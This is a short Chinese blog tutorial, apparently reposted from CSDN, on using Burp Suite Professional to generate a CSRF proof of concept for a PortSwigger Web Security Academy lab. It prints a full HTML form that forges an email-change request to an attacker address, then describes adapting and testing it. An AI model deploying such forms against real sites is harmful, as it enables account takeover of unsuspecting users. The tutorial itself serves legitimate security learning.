如何通过Burp Suite专业版构建CSRF PoC

发布时间:2024年01月15日

Burp Suite是一款强大的渗透测试利器,可以利用它来高效的执行渗透攻击,接下来介绍如何通过Burp Suite Pro来构建CSRF PoC。

  1. 在Bupr中找到拦截的请求,右键选择Engagement tools => Generate CSRF PoC
    在这里插入图片描述
  2. 利用CSRF PoC生成器自动生成HTML
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a50007d0353381f8795a7ae004c001b.web-security-academy.net/my-account/change-email" method="POST" enctype="text/plain">
      <input type="hidden" name="csrf" value="ztEXkyKgBF1CquUx7mGtX5VHoeTxBZGw&amp;email&#61;attacker&#64;163&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  1. 对生成的HTML根据攻击需要做出相应调整

  2. 将生成的HTML复制到网页中,登录到易受攻击的网站的浏览器中查看,测试是否成功发出了预期的请求并执行了相应操作。
    在这里插入图片描述

    在这里插入图片描述

参考

[1] https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf


推荐阅读
「 典型安全漏洞系列 」03.跨站请求伪造CSRF详解
「 典型安全漏洞系列 」02.SQL注入详解
「 典型安全漏洞系列 」01.跨站脚本攻击XSS详解

文章来源:https://blog.csdn.net/u013129300/article/details/135588125
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。